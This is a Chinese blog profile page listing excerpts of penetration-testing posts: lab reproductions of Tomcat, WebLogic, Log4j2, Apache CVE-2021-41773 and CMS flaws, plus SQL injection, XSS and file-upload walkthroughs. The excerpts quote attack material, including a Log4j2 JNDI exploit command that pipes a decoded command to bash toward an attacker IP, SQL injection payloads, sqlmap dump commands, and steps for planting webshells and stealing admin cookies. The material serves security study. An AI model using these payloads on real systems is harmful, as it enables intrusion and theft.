自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

原创 【解决】VMware网卡地址变成169.254.x.x

我们使用VMware经常会遇到虚拟网卡失效的情况,我们在物理机查看虚拟网卡的地址,发现虚拟网卡地址变成了由169.254.x.x开头,如下图。这时说明我们的虚拟网卡出了问题169.254.xx.xx这是微软保留地址,微软的系统设置为DHCP方式而又无法从DHCP服务器获得IP的时候,就会临时分配一个169.254.x.x的B类地址,这样局域网内的电脑就可以通过这个IP来相互通讯,也防止ip冲突。

2024-09-02 19:34:28 1278

原创 Linux安装Java(JKD)

官网/云盘/QQ群 (jdk.tar.gz)Linux的环境变量配置在。

2024-08-08 20:19:32 580 1

原创 【常见框架漏洞】Thinkphp(TP)、 struts2 、Spring、Shiro

​ ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

2024-08-07 21:40:25 1458

原创 【Jboss】常见漏洞复现

JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。

2024-08-06 22:22:16 1597

原创 【WebLogic】常见漏洞复现

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

2024-08-06 22:20:29 1322

原创 Tomcat常见漏洞复现

tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,这里我们讲几个经典的漏洞复现。

2024-08-06 22:13:17 1253

原创 Apache漏洞复现CVE-2021-41773

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cgi命令(RCE)

2024-08-06 22:10:52 276

原创 【未授权访问漏洞复现~~~】

步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…步骤二:在打开的URL中…步骤一:使用以下Fofa语法搜索使用Idap服务的产品.…步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!

2024-08-05 21:22:29 2092

原创 【复现】常见CMS漏洞

点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】

2024-08-04 18:23:51 1121

原创 【Git】学习

Git(读音为/gɪt/。)是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。Git 是 [Linus Torvalds](https://baike.baidu.com/item/Linus Torvalds/9336769) 为了帮助管理 Linux 内核开发而开发的一个开放源码的版本控制软件。Git 是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。

2024-08-04 14:03:17 973

原创 Typora+PicGo-Core(command line)+Gitee 实现上传图片到图床(看这一文就够)

​ 对于喜欢写Markdown文档的人来说,Typora无疑是一个写作利器,它有别于其他的Markdown软件,不是一边编辑一边渲染,而是即写即渲染,这样对于浏览md文件也非常友好。此外Typora还支持更换主题,在其官网可以下载到很多大佬做的主题。总而言之,Typora对于Markdown写作非常便捷。但是Typora本身不支持图片上传,如果不想每次写一篇文章就附带一个图片的文件夹(这对于文章的保存和分享造成了一些不便),需要自己设置一下图片上传。​。

2024-08-04 13:14:44 1655 1

原创 【Bugku】Web系列第二更~

num=1[字母,随便写到最后都会被PHP转化成0] 这里利用的是PHP对数字和字符串比较的时候的一个特性,他会试图把字符串转化为数字,所以1XXX转化到最后只剩下了1 构造示例:?num=1awa;args=GLOBALS 路径后面输入/?爆破完后,点击长度,查看一下最大的响应包,可以看到hack应该就是登入密码了,这里我们双击打开响应包。接着添加爆破需要的密码,这里用burpsuite自带的密码。查看源代码,一直刷新,直到看见flag。

2024-08-02 20:19:09 465

原创 【支付逻辑漏洞】靶场复现(dami、CmsEasy、Niushop)

本地搭建dami网站打开商品页面输入商品数量为负数输入收获地址,点击站内扣款,提交订单订单提交成功发现我们的金额变化,就可以正常购买。

2024-08-02 17:13:05 660 1

原创 【反序列化漏洞】serial靶机详解

发现一直报错显示无法执行空逗号,我那时候还在疑惑为什么不行,试了很久发现是包含文件是php形式的错,包含的文件会先自己进行解析(这里是test.php,会先按php进行解析),解析之后的内容再到包含文件的地方,按它那里的格式进行解析(这里是php文件,按php解析),因此这里test.php先解析的时候,$_GET['x']没有值,因此报错,而按txt解析的时候不会报这个错误,因为被当做字符串。将test.php换为test.txt,之后重新序列化,编码,写入cookie,参数,发现成功执行。

2024-08-01 21:24:10 1402

原创 Jangow-1.0.1靶机

发现html目录下有个backup文件,里面也有账号密码,继续寻找,找到一串md5。发现wordpress文件夹下有一个config.php,里面有数据库的账号密码。开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了。发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀。先尝试反弹一个shell过来,通过蚁剑写php反弹shell。发现是有网页的,随便点点,看看有没有能注入或者渗透的点。我们试着运行一下命令,发现是可以运行命令的。暂时没用,先保存一下,继续查找。

2024-07-31 22:43:52 575

原创 录音管理系统漏洞复现

发送到Repeater,将数据包修改数据包成以下内容,发送。title="在线录音管理系统"

2024-07-31 22:43:02 428

原创 log4j2漏洞复现

action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C"bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的ypsipl。

2024-07-31 22:42:04 606

原创 【Bugku】Web系列(持续更新~~~)

打开环境在输入框输入答案发现只能输入一位数,那我们想到修改输入框内容长度,我们右击页面点击检查,找到输入框的代码修改长度为10。本题是POST传参,我们通过火狐浏览器的HackBar传入post参数,根据页面的代码我们传入一个what=flag。本题是GET传参,我们在url上传入参数,根据页面的代码我们传入一个what=flag,得到flag。我们右击页面点击检查,查看页面代码,得到flag。进入环境,出现一个弹窗,点击确实发现什么也没有。点击验证,弹出窗口,得到flag。打开环境,发现一段PHP代码。

2024-07-30 20:51:00 294

原创 【文件解析漏洞复现】

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将/xx.jpg/xx.php 解析为 php 文件。在I1S7.0和I1S7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。上传一个后缀名是.php.jpg的文件里面写入

2024-07-30 20:45:56 1074

原创 文件包含漏洞Tomato靶机渗透_详解

var/log/auth.log 记录了所有和用户认证相关的日志。前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-使用kali的dirb进行目录扫描:dirb http://192.168.204.141/用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141。然后在网页端查看ubuntu报错信息:/var/log/auth.log。点开发现是一个PHP的探针文件。

2024-07-29 22:37:58 645

原创 ai web 1.0靶机漏洞渗透详解

通过上面的PHP探针文件,我们知道了网站的根目录 /home/www/html/web1x443290o2sdf92213/,我们可以利用—os-shell来操作网站系统。访问,发现是一个PHP的探针文件,通过探针文件我们可以知道网站的根目录是/home/www/html/web1x443290o2sdf92213。通过抓包得到注入点uid=1&Operation=Submit,将抓到的包保存成一个文件,在1后面加一个*,说明这里是注入点。我们扫描另一个目录,写扫描一级目录,发现一个index.php。

2024-07-29 22:36:40 829

原创 hackme靶机漏洞解析

将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径虚拟机设置里修改网络状态为NAT模式点击编辑》虚拟网络编辑器做如下箭头点击,可以看到NAT网卡得到所有信息,包括网络地址分配信息通过上述发现,这里我们直从192.168.204.128开始扫描用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.139直接访问什么也没有2、端口扫描使用kali命令扫描nmap -A 192.168.204.139-p-发现开放22和80端口,包括对应的服务。

2024-07-29 22:34:29 488

原创 【文件上传漏洞】upload-labs靶场通关

可以使用phtml、php3、php4、php5,当然前提是apache服务器,同时在配置文件夹中需要有将AddType application/x-httpd-php .php .phtml .phps .php1 .php5 .pht 这样的一段话前面的注释删除,重启phpstudy让其生效。条件竞争就是在源代码中是存在校验的,但是校验是在文件上传后,才开始校验,也就是文件先上传至服务器中,然后服务器会对该文件进行校验,当符合的时候则会对文件进行重命名,当文件不符合要求的时候就对将文件进行删除。

2024-07-27 18:54:57 1006

原创 【XEE实战项目】虚拟机部署-XXE靶机通关详解

可以看到the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5),这串代码也是进行了加密,我们再进行解密,他的加密方式是base32 (一般MD5加密是32位,base64加密末尾都有等于号,没有等于号的可能是base32加密,严格意义上说是编码),将其解码看一下。解码以后,我们发现看不懂,但是我们知道他是php文件,可能是php代码,新建一个php文件,将代码写进去,访问一下。解码之后,我们可以发现有账号密码,但是密码用MD5进行了加密,解密一下。得到flag,完美!

2024-07-25 21:29:14 987

原创 CTFHub技能树 Web-SSRF系列通过全技巧(已完结)

第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变。第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。

2024-07-24 21:42:00 1389

原创 xss平台获取管理员cookie

第四步:进入后台管理界面登陆,刷新xss平台,我们发现一条记录,点击查看,可以看到管理员的cookie。第三步:打开本机搭建的靶场pikachu平台,点击xss盲打将上面复制的内容粘贴到输入框里并提交。第二步:此时我的项目里就会生成一个test1的项目,并点击查看配置代码,复制圈出地方的代码。第一步:注册以下网站并登陆,点击创建项目,输入项目名字,并提交。

2024-07-23 20:49:51 380

原创 xss flash钓鱼拿到主机控制权

第六步:将生成的文件和Flash安装包用WinRAR一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",并做如图配置后,点击确定。项目地址:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash。第三步:来到xssaq平台,点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成js文件放到我们网站的根目录下面。第二步:下载Flash项目源码文件,并部署在网站根目录下,访问。

2024-07-23 20:48:55 395

原创 靶场sqli-labs-master通关攻略

通过group_concat()函数将查询到的表名拼接到一块输出。已经判断完数据库查询表有3列,那么联合查询3列,查数据库名。当order by = 4页面异常,说明当前表有三列。通过输入异常id,让回显位置显示当前数据库名。路径添加 ' 后页面异常。添加条件为真,页面正常。添加条件为假,页面异常。

2024-07-22 20:58:45 273 1

原创 【墨者学院】SQL手工注入漏洞测试(MySQL数据库)

id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member'--+我们进行布尔判断输入1=1和1=2,发现页面不一样,说明我们输入的参数被带入到了数据库执行,通过判断可以发现本题是整数型注入。一、打开网站,可以发现可以登陆,还可以点击公告。

2024-07-22 20:29:53 352

原创 【墨者学院】SQL注入漏洞测试(登录绕过)

一位网站管理员声称自己的管理员密码设置的十分复杂,是不可能被破解的;没想到被渗透测试人员一举拿下,请你也帮他试试看能不能登录管理员账户。二、根据提示是sql注入的万能密码,那么我们在登录框尝试' or 1=1#三、点击登陆,发现登陆成功,找到了KEY。2、掌握数据库和网页的注释符;1、了解常用网站万能密码;利用万能密码绕过登录验证。

2024-07-22 20:28:12 442

原创 【墨者学院】SQL手工注入漏洞测试(Db2数据库)

三、查询表的数据,python3 sqlmap.py -u "自己复制的链接" -D DB2INST1 -T GAME_CHARACTER --dump --batch 运行 ,可以发现就一个id,通过判断可能是隐藏了其他字段,我们指定字段,查询python3 sqlmap.py -u "自己复制的链接" -D DB2INST1 -T GAME_CHARACTER -C id,name,password --dump --batch 运行,查询到用户名和密码。手工进行SQL注入测试,获取管理密码登录。

2024-07-22 20:25:26 357

原创 【墨者学院】SQL注入漏洞测试(POST)

一、抓登陆界面的包,复制到一个文件里,用sqlmap跑,输入python3 sqlmap.py -r 存放请求包的文件 –current-db –batch,得到当前数据库名。二,输入python3 sqlmap.py -r 存放请求包的文件 -D mozhe_Discuz_StormGroup --dump –batch,找到用户名和密码。WEB业务系统中,POST方式提交数据很常见,如登录框、留言评论等可能都会用到,这种与GET方式其实差别不大,一样会存在SQL注入的漏洞。或通过绕过方式进入管理后。

2024-07-22 20:24:01 316

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除